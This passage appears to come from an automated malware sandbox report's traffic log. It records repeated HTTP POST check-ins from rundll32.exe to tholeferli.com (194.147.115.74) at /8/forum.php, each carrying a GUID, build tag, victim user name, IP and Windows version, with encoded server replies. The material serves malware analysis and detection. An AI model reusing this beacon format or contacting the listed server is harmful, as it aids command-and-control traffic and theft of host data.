                                                Data Raw: 63 0d 0a 43 48 53 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cCHSXARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                178192.168.2.2249345194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:12:33.578170061 CEST495OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:33.747662067 CEST495INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:33 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 56 4b 50 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cVKPEARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                179192.168.2.2249346194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:12:34.034382105 CEST496OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:34.205979109 CEST496INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:34 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 51 46 55 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cQFUJARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                18192.168.2.2249185194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:10.984551907 CEST315OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:11.153819084 CEST315INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:11 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 51 51 4a 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cQQJJARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                180192.168.2.2249347194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:12:34.498697042 CEST497OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:34.654334068 CEST497INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:34 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 5a 47 54 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cZGTAARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                181192.168.2.2249348194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:12:34.935930967 CEST498OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:35.091860056 CEST498INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:34 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 42 5a 41 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cBZAYARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                182192.168.2.2249349194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:12:35.416528940 CEST499OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:35.574692965 CEST500INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:35 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 4a 5a 41 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cJZAQARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                183192.168.2.2249350194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:12:35.860683918 CEST500OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:36.016088963 CEST501INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:35 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 5a 4e 4d 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cZNMAARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                184192.168.2.2249351194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:12:36.291343927 CEST502OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:36.460500956 CEST502INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:36 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 4d 43 58 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cMCXNARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                185192.168.2.2249352194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:12:36.727144957 CEST503OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:36.894742012 CEST503INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:36 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 4d 43 58 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cMCXNARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                186192.168.2.2249353194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:12:37.342535019 CEST504OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:37.501259089 CEST504INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:37 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 5a 5a 41 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cZZAAARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                187192.168.2.2249354194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:12:38.112885952 CEST505OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:38.268619061 CEST505INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:38 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 47 5a 41 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cGZATARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                188192.168.2.2249355194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:12:38.569412947 CEST506OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:38.741261005 CEST506INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:38 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 54 5a 41 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cTZAGARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                189192.168.2.2249356194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:12:39.036431074 CEST507OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:40.207247019 CEST507INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:40 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 48 48 53 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cHHSSARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                19192.168.2.2249186194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:11.662718058 CEST316OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:11.833951950 CEST317INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:11 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 41 51 4a 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cAQJZARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                190192.168.2.2249357194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:12:40.500648022 CEST508OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:40.669029951 CEST509INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:40 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 51 54 47 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cQTGJARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                191192.168.2.2249358194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:12:40.945125103 CEST509OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:41.113933086 CEST510INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:40 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 5a 56 45 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cZVEAARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                192192.168.2.2249359194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:12:41.403152943 CEST510OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:41.561014891 CEST511INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:41 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 41 4e 4d 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cANMZARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                193192.168.2.2249360194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:12:41.838561058 CEST512OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
